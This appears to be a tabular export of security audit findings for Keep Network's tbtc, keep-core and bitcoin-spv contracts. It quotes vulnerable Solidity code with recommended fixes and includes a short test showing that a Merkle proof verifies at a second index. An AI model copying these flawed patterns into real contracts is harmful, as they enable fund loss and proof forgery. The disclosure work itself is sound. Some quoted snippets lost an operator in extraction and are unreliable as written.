require(\\_tbtcToken.balanceOf(msg.sender) >= lotSizeTbtc, ""Not enough TBTC to cover outstanding debt"");\\n\\n if(tdtHolder == \\_d.VendingMachine){\\n \\_tbtcToken.burnFrom(msg.sender, lotSizeTbtc); // burn minimal amount to cover size\\n }\\n else{\\n \\_tbtcToken.transferFrom(msg.sender, tdtHolder, lotSizeTbtc);\\n }\\n\\n // Distribute funds to auction buyer\\n uint256 \\_valueToDistribute = \\_d.auctionValue();\\n msg.sender.transfer(\\_valueToDistribute);\\n\\n // Send any TBTC left to the Fee Rebate Token holder\\n \\_d.distributeFeeRebate();\\n\\n // For fraud, pay remainder to the liquidation initiator.\\n // For non-fraud, split 50-50 between initiator and signers. if the transfer amount is 1,\\n // division will yield a 0 value which causes a revert; instead, \\n // we simply ignore such a tiny amount and leave some wei dust in escrow\\n uint256 contractEthBalance = address(this).balance;\\n address payable initiator = \\_d.liquidationInitiator;\\n\\n if (initiator == address(0)){\\n initiator = address(0xdead);\\n }\\n if (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n }\\n}\\n```\\n" +bitcoin-spv - verifyHash256Merkle allows existence proofs for the same leaf in multiple locations in the tree Won't Fix,medium,"`BTCUtils.verifyHash256Merkle` is used by `ValidateSPV.prove` to validate a transaction's existence in a Bitcoin block. The function accepts as input a `_proof` and an `_index`. The `_proof` consists of, in order: the transaction hash, a list of intermediate nodes, and the merkle root.\\nThe proof is performed iteratively, and uses the `_index` to determine whether the next proof element represents a “left branch” or a “right branch:”\\n```\\nuint \\_idx = \\_index;\\nbytes32 \\_root = \\_proof.slice(\\_proof.length - 32, 32).toBytes32();\\nbytes32 \\_current = \\_proof.slice(0, 32).toBytes32();\\n\\nfor (uint i = 1; i < (\\_proof.length.div(32)) - 1; i++) {\\n if (\\_idx % 2 == 1) {\\n \\_current = \\_hash256MerkleStep(\\_proof.slice(i \\* 32, 32), abi.encodePacked(\\_current));\\n } else {\\n \\_current = \\_hash256MerkleStep(abi.encodePacked(\\_current), \\_proof.slice(i \\* 32, 32));\\n }\\n \\_idx = \\_idx 1;\\n}\\nreturn \\_current == \\_root;\\n```\\n\\nIf `_idx` is even, the computed hash is placed before the next proof element. If `_idx` is odd, the computed hash is placed after the next proof element. After each iteration, `_idx` is decremented by `_idx /= 2`.\\nBecause `verifyHash256Merkle` makes no requirements on the size of `_proof` relative to `_index`, it is possible to pass in invalid values for `_index` that prove a transaction's existence in multiple locations in the tree.\\nBy modifying existing tests, we showed that any transaction can be proven to exist at least one alternate index. This alternate index is calculated as `(2 ** treeHeight) + prevIndex` - though other alternate indices are possible. The modified test is below:\\n```\\nit('verifies a bitcoin merkle root', async () => {\\n for (let i = 0; i < verifyHash256Merkle.length; i += 1) {\\n const res = await instance.verifyHash256Merkle(\\n verifyHash256Merkle[i].input.proof,\\n verifyHash256Merkle[i].input.index\\n ); // 0-indexed\\n assert.strictEqual(res, verifyHash256Merkle[i].output);\\n\\n // Now, attempt to use the same proof to verify the same leaf at\\n // a different index in the tree:\\n let pLen = verifyHash256Merkle[i].input.proof.length;\\n let height = ((pLen - 2) / 64) - 2;\\n\\n // Only attempt to verify roots that are meant to be verified\\n if (verifyHash256Merkle[i].output && height >= 1) {\\n let altIdx = (2 ** height) + verifyHash256Merkle[i].input.index;\\n\\n const resNext = await instance.verifyHash256Merkle(\\n verifyHash256Merkle[i].input.proof,\\n altIdx\\n );\\n\\n assert.strictEqual(resNext, verifyHash256Merkle[i].output);\\n\\n console.log('Verified transaction twice!');\\n }\\n }\\n});\\n```\\n","Use the length of `_proof` to determine the maximum allowed `_index`. `_index` should satisfy the following criterion: `_index` < 2 ** (_proof.length.div(32) - 2).\\nNote that subtraction by 2 accounts for the transaction hash and merkle root, which are assumed to be encoded in the proof along with the intermediate nodes.",,"```\\nuint \\_idx = \\_index;\\nbytes32 \\_root = \\_proof.slice(\\_proof.length - 32, 32).toBytes32();\\nbytes32 \\_current = \\_proof.slice(0, 32).toBytes32();\\n\\nfor (uint i = 1; i < (\\_proof.length.div(32)) - 1; i++) {\\n if (\\_idx % 2 == 1) {\\n \\_current = \\_hash256MerkleStep(\\_proof.slice(i \\* 32, 32), abi.encodePacked(\\_current));\\n } else {\\n \\_current = \\_hash256MerkleStep(abi.encodePacked(\\_current), \\_proof.slice(i \\* 32, 32));\\n }\\n \\_idx = \\_idx 1;\\n}\\nreturn \\_current == \\_root;\\n```\\n" +keep-core - stake operator should not be eligible if undelegatedAt is set,low,An operator's stake should not be eligible if they stake an amount and immediately call `undelegate` in an attempt to indicate that they are going to recover their stake soon.\\n```\\nbool notUndelegated = block.number <= operator.undelegatedAt || operator.undelegatedAt == 0;\\n\\nif (isAuthorized && isActive && notUndelegated) {\\n balance = operator.amount;\\n}\\n```\\n,A stake that is entering undelegation is indicated by `operator.undelegatedAt` being non-zero. Change the `notUndelegated` check block.number <= `operator.undelegatedAt` || `operator.undelegatedAt` == 0 to `operator.undelegatedAT == 0` as any value being set indicates that undelegation is in progress.\\nEnforce that within the initialization period stake is canceled instead of being undelegated.,,```\\nbool notUndelegated = block.number <= operator.undelegatedAt || operator.undelegatedAt == 0;\\n\\nif (isAuthorized && isActive && notUndelegated) {\\n balance = operator.amount;\\n}\\n```\\n +keep-core - Specification inconsistency: TokenStaking amount to be slashed/seized,low,"The keep specification states that `slash` and `seize` affect at least the amount specified or the remaining stake of a member.\\nSlash each operator in the list misbehavers by the specified amount (or their remaining stake, whichever is lower).\\nPunish each operator in the list misbehavers by the specified amount or their remaining stake.\\nThe implementation, however, bails if one of the accounts does not have enough stake to be slashed or seized because of the use of `SafeMath.sub()`. This behavior is inconsistent with the specification which states that `min(amount, misbehaver.stake)` stake should be affected. The call to slash/seize will revert and no stakes are affected. At max, the staked amount of the lowest staker can be slashed/seized from every staker.\\nImplementing this method as stated in the specification using `min(amount, misbehaver.stake)` will cover the fact that slashing/seizing was only partially successful. If `misbehaver.stake` is zero no error might be emitted even though no stake was slashed/seized.\\n```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], ""Not authorized"");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n\\n/\\*\\*\\n \\* @dev Seize provided token amount from every member in the misbehaved\\n \\* operators array. The tattletale is rewarded with 5% of the total seized\\n \\* amount scaled by the reward adjustment parameter and the rest 95% is burned.\\n \\* @param amount Token amount to seize from every misbehaved operator.\\n \\* @param rewardMultiplier Reward adjustment in percentage. Min 1% and 100% max.\\n \\* @param tattletale Address to receive the 5% reward.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction seize(\\n uint256 amount,\\n uint256 rewardMultiplier,\\n address tattletale,\\n address[] memory misbehavedOperators\\n) public onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], ""Not authorized"");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n uint256 total = misbehavedOperators.length.mul(amount);\\n uint256 tattletaleReward = (total.mul(5).div(100)).mul(rewardMultiplier).div(100);\\n\\n token.transfer(tattletale, tattletaleReward);\\n token.burn(total.sub(tattletaleReward));\\n}\\n```\\n",Require that `minimumStake` has been provided and can be seized/slashed. Update the documentation to reflect the fact that the solution always seizes/slashes `minimumStake`. Ensure that stakers cannot cancel their stake while they are actively participating in the network.,,"```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], ""Not authorized"");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n\\n/\\*\\*\\n \\* @dev Seize provided token amount from every member in the misbehaved\\n \\* operators array. The tattletale is rewarded with 5% of the total seized\\n \\* amount scaled by the reward adjustment parameter and the rest 95% is burned.\\n \\* @param amount Token amount to seize from every misbehaved operator.\\n \\* @param rewardMultiplier Reward adjustment in percentage. Min 1% and 100% max.\\n \\* @param tattletale Address to receive the 5% reward.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction seize(\\n uint256 amount,\\n uint256 rewardMultiplier,\\n address tattletale,\\n address[] memory misbehavedOperators\\n) public onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], ""Not authorized"");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n uint256 total = misbehavedOperators.length.mul(amount);\\n uint256 tattletaleReward = (total.mul(5).div(100)).mul(rewardMultiplier).div(100);\\n\\n token.transfer(tattletale, tattletaleReward);\\n token.burn(total.sub(tattletaleReward));\\n}\\n```\\n" +keep-tecdsa - Change state-mutability of checkSignatureFraud to view,low,"```\\nfunction submitSignatureFraud(\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes calldata \\_preimage\\n) external returns (bool \\_isFraud) {\\n require(publicKey.length != 0, ""Public key was not set yet"");\\n\\n bytes32 calculatedDigest = sha256(\\_preimage);\\n require(\\n \\_signedDigest == calculatedDigest,\\n ""Signed digest does not match double sha256 hash of the preimage""\\n );\\n\\n bool isSignatureValid = publicKeyToAddress(publicKey) ==\\n ecrecover(\\_signedDigest, \\_v, \\_r, \\_s);\\n\\n // Check if the signature is valid but was not requested.\\n require(\\n isSignatureValid && !digests[\\_signedDigest],\\n ""Signature is not fraudulent""\\n );\\n\\n return true;\\n}\\n```\\n",Declare method as `view`. Consider renaming `submitSignatureFraud` to e.g. `checkSignatureFraud` to emphasize that it is only checking the signature and not actually changing state.,,"```\\nfunction submitSignatureFraud(\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes calldata \\_preimage\\n) external returns (bool \\_isFraud) {\\n require(publicKey.length != 0, ""Public key was not set yet"");\\n\\n bytes32 calculatedDigest = sha256(\\_preimage);\\n require(\\n \\_signedDigest == calculatedDigest,\\n ""Signed digest does not match double sha256 hash of the preimage""\\n );\\n\\n bool isSignatureValid = publicKeyToAddress(publicKey) ==\\n ecrecover(\\_signedDigest, \\_v, \\_r, \\_s);\\n\\n // Check if the signature is valid but was not requested.\\n require(\\n isSignatureValid && !digests[\\_signedDigest],\\n ""Signature is not fraudulent""\\n );\\n\\n return true;\\n}\\n```\\n" +keep-core - Specification inconsistency: TokenStaking.slash() is never called,low,"According to the keep specification stake should be slashed if a staker violates the protocol:\\nSlashing If a staker violates the protocol of an operation in a way which can be proven on-chain, they will be penalized by having their stakes slashed.\\nWhile this functionality can only be called by the approved operator contract, it is not being used throughout the system. In contrast `seize()` is being called when reporting unauthorized signing or relay entry timeout.\\n```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], ""Not authorized"");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n```\\n",Implement slashing according to the specification.,,"```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], ""Not authorized"");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n```\\n" +tbtc - Remove notifyDepositExpiryCourtesyCall and allow exitCourtesyCall exiting the courtesy call at term,low,"Following a deep dive into state transitions with the client it was agreed that `notifyDepositExpiryCourtesyCall` should be removed from the system as it is a left-over of a previous version of the deposit contract.\\nAdditionally, `exitCourtesyCall` should be callable at any time.\\n```\\n/// @notice Goes from courtesy call to active\\n/// @dev Only callable if collateral is sufficient and the deposit is not expiring\\n/// @param \\_d deposit storage pointer\\nfunction exitCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inCourtesyCall(), ""Not currently in courtesy call"");\\n require(block.timestamp <= \\_d.fundedAt + TBTCConstants.getDepositTerm(), ""Deposit is expiring"");\\n require(getCollateralizationPercentage(\\_d) >= \\_d.undercollateralizedThresholdPercent, ""Deposit is still undercollateralized"");\\n \\_d.setActive();\\n \\_d.logExitedCourtesyCall();\\n}\\n```\\n",Remove the `notifyDepositExpiryCourtesyCall` state transition and remove the requirement on `exitCourtesyCall` being callable only before the deposit expires.,,"```\\n/// @notice Goes from courtesy call to active\\n/// @dev Only callable if collateral is sufficient and the deposit is not expiring\\n/// @param \\_d deposit storage pointer\\nfunction exitCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inCourtesyCall(), ""Not currently in courtesy call"");\\n require(block.timestamp <= \\_d.fundedAt + TBTCConstants.getDepositTerm(), ""Deposit is expiring"");\\n require(getCollateralizationPercentage(\\_d) >= \\_d.undercollateralizedThresholdPercent, ""Deposit is still undercollateralized"");\\n \\_d.setActive();\\n \\_d.logExitedCourtesyCall();\\n}\\n```\\n" +keep-tecdsa - withdraw should check for zero value transfer,low,"Requesting the withdrawal of zero `ETH` in `KeepBonding.withdraw` should fail as this would allow the method to succeed, calling the user-provided destination even though the sender has no unbonded value.\\n```\\nfunction withdraw(uint256 amount, address payable destination) public {\\n require(\\n unbondedValue[msg.sender] >= amount,\\n ""Insufficient unbonded value""\\n );\\n\\n unbondedValue[msg.sender] -= amount;\\n\\n (bool success, ) = destination.call.value(amount)("""");\\n require(success, ""Transfer failed"");\\n}\\n```\\n\\nAnd a similar instance in BondedECDSAKeep:\\n```\\n/// @notice Withdraws amount of ether hold in the keep for the member.\\n/// The value is sent to the beneficiary of the specific member.\\n/// @param \\_member Keep member address.\\nfunction withdraw(address \\_member) external {\\n uint256 value = memberETHBalances[\\_member];\\n memberETHBalances[\\_member] = 0;\\n\\n /\\* solium-disable-next-line security/no-call-value \\*/\\n (bool success, ) = tokenStaking.magpieOf(\\_member).call.value(value)("""");\\n\\n require(success, ""Transfer failed"");\\n}\\n```\\n",Require that the amount to be withdrawn is greater than zero.,,"```\\nfunction withdraw(uint256 amount, address payable destination) public {\\n require(\\n unbondedValue[msg.sender] >= amount,\\n ""Insufficient unbonded value""\\n );\\n\\n unbondedValue[msg.sender] -= amount;\\n\\n (bool success, ) = destination.call.value(amount)("""");\\n require(success, ""Transfer failed"");\\n}\\n```\\n" +tbtc - Signer collusion may bypass increaseRedemptionFee flow,low,"DepositRedemption.increaseRedemptionFee is used by signers to approve a signable bitcoin transaction with a higher fee, in case the network is congested and miners are not approving the lower-fee transaction.\\nFee increases can be performed every 4 hours:\\n```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), ""Fee increase not yet permitted"");\\n```\\n\\nIn addition, each increase must increment the fee by exactly the initial proposed fee:\\n```\\n// Check that we're incrementing the fee by exactly the redeemer's initial fee\\nuint256 \\_previousOutputValue = DepositUtils.bytes8LEToUint(\\_previousOutputValueBytes);\\n\\_newOutputValue = DepositUtils.bytes8LEToUint(\\_newOutputValueBytes);\\nrequire(\\_previousOutputValue.sub(\\_newOutputValue) == \\_d.initialRedemptionFee, ""Not an allowed fee step"");\\n```\\n\\nOutside of these two restrictions, there is no limit to the number of times `increaseRedemptionFee` can be called. Over a 20-hour period, for example, `increaseRedemptionFee` could be called 5 times, increasing the fee to `initialRedemptionFee * 5`.\\nRather than calling `increaseRedemptionFee` 5 times over 20 hours, colluding signers may immediately create and sign a transaction with a fee of `initialRedemptionFee * 5`, wait for it to be mined, then submit it to `provideRedemptionProof`. Because `provideRedemptionProof` does not check that a transaction signature signs an approved digest, interested parties would need to monitor the bitcoin blockchain, notice the spend, and provide an ECDSA fraud proof before `provideRedemptionProof` is called.","Resolution\\nIssue addressed in keep-network/tbtc#522\\nTrack the latest approved fee, and ensure the transaction in `provideRedemptionProof` does not include a higher fee.",,"```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), ""Fee increase not yet permitted"");\\n```\\n" +tbtc - liquidating a deposit does not send the complete remainder of the contract balance to recipients,low,`purchaseSignerBondsAtAuction` might leave a wei in the contract if:\\nthere is only one wei remaining in the contract\\nthere is more than one wei remaining but the contract balance is odd.\\ncontract balances must be > 1 wei otherwise no transfer is attempted\\nthe division at line 271 floors the result if dividing an odd balance. The contract is sending `floor(contract.balance / 2)` to the keep group and liquidationInitiator leaving one 1 in the contract.\\n```\\nif (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n}\\n```\\n,"Define a reasonable minimum amount when awarding the fraud reporter or liquidation initiator. Alternatively, always transfer the contract balance. When splitting the amount use the contract balance after the first transfer as the value being sent to the second recipient. Use the presence of locked funds in a contract as an error indicator unless funds were sent forcefully to the contract.",,```\\nif (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n}\\n```\\n +tbtc - approveAndCall unused return parameter,low,"`approveAndCall` always returns false because the return value `bool success` is never set.\\n```\\n/// @notice Set allowance for other address and notify.\\n/// Allows `\\_spender` to transfer the specified TDT\\n/// on your behalf and then ping the contract about it.\\n/// @dev The `\\_spender` should implement the `tokenRecipient` interface below\\n/// to receive approval notifications.\\n/// @param \\_spender Address of contract authorized to spend.\\n/// @param \\_tdtId The TDT they can spend.\\n/// @param \\_extraData Extra information to send to the approved contract.\\nfunction approveAndCall(address \\_spender, uint256 \\_tdtId, bytes memory \\_extraData) public returns (bool success) {\\n tokenRecipient spender = tokenRecipient(\\_spender);\\n approve(\\_spender, \\_tdtId);\\n spender.receiveApproval(msg.sender, \\_tdtId, address(this), \\_extraData);\\n}\\n```\\n",Return the correct success state.,,"```\\n/// @notice Set allowance for other address and notify.\\n/// Allows `\\_spender` to transfer the specified TDT\\n/// on your behalf and then ping the contract about it.\\n/// @dev The `\\_spender` should implement the `tokenRecipient` interface below\\n/// to receive approval notifications.\\n/// @param \\_spender Address of contract authorized to spend.\\n/// @param \\_tdtId The TDT they can spend.\\n/// @param \\_extraData Extra information to send to the approved contract.\\nfunction approveAndCall(address \\_spender, uint256 \\_tdtId, bytes memory \\_extraData) public returns (bool success) {\\n tokenRecipient spender = tokenRecipient(\\_spender);\\n approve(\\_spender, \\_tdtId);\\n spender.receiveApproval(msg.sender, \\_tdtId, address(this), \\_extraData);\\n}\\n```\\n" +bitcoin-spv - Unnecessary memory allocation in BTCUtils Pending,low,"`BTCUtils` makes liberal use of `BytesLib.slice`, which returns a freshly-allocated slice of an existing bytes array. In many cases, the desired behavior is simply to read a 32-byte slice of a byte array. As a result, the typical pattern used is: `bytesVar.slice(start, start + 32).toBytes32()`.\\nThis pattern introduces unnecessary complexity and memory allocation in a critically important library: cloning a portion of the array, storing that clone in memory, and then reading it from memory. A simpler alternative would be to implement `BytesLib.readBytes32(bytes _b, uint _idx)` and other “memory-read” functions.\\nRather than moving the free memory pointer and redundantly reading, storing, then re-reading memory, `readBytes32` and similar functions would perform a simple length check and `mload` directly from the desired index in the array.\\nextractInputTxIdLE:\\n```\\n/// @notice Extracts the outpoint tx id from an input\\n/// @dev 32 byte tx id\\n/// @param \\_input The input\\n/// @return The tx id (little-endian bytes)\\nfunction extractInputTxIdLE(bytes memory \\_input) internal pure returns (bytes32) {\\n return \\_input.slice(0, 32).toBytes32();\\n}\\n```\\n\\nverifyHash256Merkle:\\n```\\nuint \\_idx = \\_index;\\nbytes32 \\_root = \\_proof.slice(\\_proof.length - 32, 32).toBytes32();\\nbytes32 \\_current = \\_proof.slice(0, 32).toBytes32();\\n\\nfor (uint i = 1; i < (\\_proof.length.div(32)) - 1; i++) {\\n if (\\_idx % 2 == 1) {\\n \\_current = \\_hash256MerkleStep(\\_proof.slice(i \\* 32, 32), abi.encodePacked(\\_current));\\n } else {\\n \\_current = \\_hash256MerkleStep(abi.encodePacked(\\_current), \\_proof.slice(i \\* 32, 32));\\n }\\n \\_idx = \\_idx 1;\\n}\\nreturn \\_current == \\_root;\\n```\\n","Implement `BytesLib.readBytes32` and favor its use over the `bytesVar.slice(start, start + 32).toBytes32()` pattern. Implement other memory-read functions where possible, and avoid the use of `slice`.\\nNote, too, that implementing this change in `verifyHash256Merkle` would allow `_hash256MerkleStep` to accept 2 `bytes32` inputs (rather than bytes), removing additional unnecessary casting and memory allocation.",,"```\\n/// @notice Extracts the outpoint tx id from an input\\n/// @dev 32 byte tx id\\n/// @param \\_input The input\\n/// @return The tx id (little-endian bytes)\\nfunction extractInputTxIdLE(bytes memory \\_input) internal pure returns (bytes32) {\\n return \\_input.slice(0, 32).toBytes32();\\n}\\n```\\n" +bitcoin-spv - ValidateSPV.validateHeaderChain does not completely validate input Won't Fix,low,"`ValidateSPV.validateHeaderChain` takes as input a sequence of Bitcoin headers and calculates the total accumulated difficulty across the entire sequence. The input headers are checked to ensure they are relatively well-formed:\\n```\\n// Check header chain length\\nif (\\_headers.length % 80 != 0) {return ERR\\_BAD\\_LENGTH;}\\n```\\n\\nHowever, the function lacks a check for nonzero length of `_headers`. Although the total difficulty returned would be zero, an explicit check would make this more clear.","If `headers.length` is zero, return `ERR_BAD_LENGTH`",,```\\n// Check header chain length\\nif (\\_headers.length % 80 != 0) {return ERR\\_BAD\\_LENGTH;}\\n```\\n +bitcoin-spv - unnecessary intermediate cast,low,"`CheckBitcoinSigs.accountFromPubkey()` casts the `bytes32` keccack256 hash of the `pubkey` to `uint256`, then `uint160` and then finally to `address` while the intermediate cast is not required.\\n```\\n/// @notice Derives an Ethereum Account address from a pubkey\\n/// @dev The address is the last 20 bytes of the keccak256 of the address\\n/// @param \\_pubkey The public key X & Y. Unprefixed, as a 64-byte array\\n/// @return The account address\\nfunction accountFromPubkey(bytes memory \\_pubkey) internal pure returns (address) {\\n require(\\_pubkey.length == 64, ""Pubkey must be 64-byte raw, uncompressed key."");\\n\\n // keccak hash of uncompressed unprefixed pubkey\\n bytes32 \\_digest = keccak256(\\_pubkey);\\n return address(uint160(uint256(\\_digest)));\\n}\\n```\\n",The intermediate cast from `uint256` to `uint160` can be omitted. Refactor to `return address(uint256(_digest))` instead.,,"```\\n/// @notice Derives an Ethereum Account address from a pubkey\\n/// @dev The address is the last 20 bytes of the keccak256 of the address\\n/// @param \\_pubkey The public key X & Y. Unprefixed, as a 64-byte array\\n/// @return The account address\\nfunction accountFromPubkey(bytes memory \\_pubkey) internal pure returns (address) {\\n require(\\_pubkey.length == 64, ""Pubkey must be 64-byte raw, uncompressed key."");\\n\\n // keccak hash of uncompressed unprefixed pubkey\\n bytes32 \\_digest = keccak256(\\_pubkey);\\n return address(uint160(uint256(\\_digest)));\\n}\\n```\\n" +bitcoin-spv - unnecessary logic in BytesLib.toBytes32(),low,"The heavily used library function `BytesLib.toBytes32()` unnecessarily casts `_source` to `bytes` (same type) and creates a copy of the dynamic byte array to check it's length, while this can be done directly on the user-provided `bytes` `_source`.\\n```\\nfunction toBytes32(bytes memory \\_source) pure internal returns (bytes32 result) {\\n bytes memory tempEmptyStringTest = bytes(\\_source);\\n if (tempEmptyStringTest.length == 0) {\\n return 0x0;\\n }\\n\\n assembly {\\n result := mload(add(\\_source, 32))\\n }\\n}\\n```\\n","```\\nfunction toBytes32(bytes memory \\_source) pure internal returns (bytes32 result) {\\n if (\\_source.length == 0) {\\n return 0x0;\\n }\\n\\n assembly {\\n result := mload(add(\\_source, 32))\\n }\\n }\\n```\\n",,"```\\nfunction toBytes32(bytes memory \\_source) pure internal returns (bytes32 result) {\\n bytes memory tempEmptyStringTest = bytes(\\_source);\\n if (tempEmptyStringTest.length == 0) {\\n return 0x0;\\n }\\n\\n assembly {\\n result := mload(add(\\_source, 32))\\n }\\n}\\n```\\n" +bitcoin-spv - redundant functionality Won't Fix,low,"The library exposes redundant implementations of bitcoins double `sha256`.\\nsolidity native implementation with an overzealous type correction issue 5.45\\n```\\n/// @notice Implements bitcoin's hash256 (double sha2)\\n/// @dev abi.encodePacked changes the return to bytes instead of bytes32\\n/// @param \\_b The pre-image\\n/// @return The digest\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\n\\nassembly implementation\\nNote this implementation does not handle errors when staticcall'ing the precompiled `sha256` contract (private chains).\\n```\\n/// @notice Implements bitcoin's hash256 (double sha2)\\n/// @dev sha2 is precompiled smart contract located at address(2)\\n/// @param \\_b The pre-image\\n/// @return The digest\\nfunction hash256View(bytes memory \\_b) internal view returns (bytes32 res) {\\n assembly {\\n let ptr := mload(0x40)\\n pop(staticcall(gas, 2, add(\\_b, 32), mload(\\_b), ptr, 32))\\n pop(staticcall(gas, 2, ptr, 32, ptr, 32))\\n res := mload(ptr)\\n }\\n}\\n```\\n","We recommend providing only one implementation for calculating the double `sha256` as maintaining two interfaces for the same functionality is not desirable. Furthermore, even though the assembly implementation is saving gas, we recommend keeping the language provided implementation.",,```\\n/// @notice Implements bitcoin's hash256 (double sha2)\\n/// @dev abi.encodePacked changes the return to bytes instead of bytes32\\n/// @param \\_b The pre-image\\n/// @return The digest\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\n +bitcoin-spv - unnecessary type correction,low,The type correction `encodePacked().toBytes32()` is not needed as `sha256` already returns `bytes32`.\\n```\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\n,Refactor to `return sha256(abi.encodePacked(sha256(_b)));` to save gas.,,```\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\n +"tbtc - Where possible, a specific contract type should be used rather than address",low,"Rather than storing addresses and then casting to the known contract type, it's better to use the best type available so the compiler can check for type safety.\\n`TBTCSystem.priceFeed` is of type `address`, but it could be type `IBTCETHPriceFeed` instead. Not only would this give a little more type safety when deploying new modules, but it would avoid repeated casts throughout the codebase of the form `IBTCETHPriceFeed(priceFeed)`, `IRelay(relay)`, `TBTCSystem()`, and others.\\n```\\nstruct Deposit {\\n\\n // SET DURING CONSTRUCTION\\n address TBTCSystem;\\n address TBTCToken;\\n address TBTCDepositToken;\\n address FeeRebateToken;\\n address VendingMachine;\\n uint256 lotSizeSatoshis;\\n uint8 currentState;\\n uint256 signerFeeDivisor;\\n uint128 undercollateralizedThresholdPercent;\\n uint128 severelyUndercollateralizedThresholdPercent;\\n```\\n\\n```\\ncontract DepositFactory is CloneFactory, TBTCSystemAuthority{\\n\\n // Holds the address of the deposit contract\\n // which will be used as a master contract for cloning.\\n address public masterDepositAddress;\\n address public tbtcSystem;\\n address public tbtcToken;\\n address public tbtcDepositToken;\\n address public feeRebateToken;\\n address public vendingMachine;\\n uint256 public keepThreshold;\\n uint256 public keepSize;\\n```\\n\\nRemediation\\nWhere possible, use more specific types instead of `address`. This goes for parameter types as well as state variable types.",Resolution\\nThis issue has been addressed with https://github.com/keep-network/tbtc/issues/507 and keep-network/tbtc#542.,,```\\nstruct Deposit {\\n\\n // SET DURING CONSTRUCTION\\n address TBTCSystem;\\n address TBTCToken;\\n address TBTCDepositToken;\\n address FeeRebateToken;\\n address VendingMachine;\\n uint256 lotSizeSatoshis;\\n uint8 currentState;\\n uint256 signerFeeDivisor;\\n uint128 undercollateralizedThresholdPercent;\\n uint128 severelyUndercollateralizedThresholdPercent;\\n```\\n +tbtc - Variable shadowing in 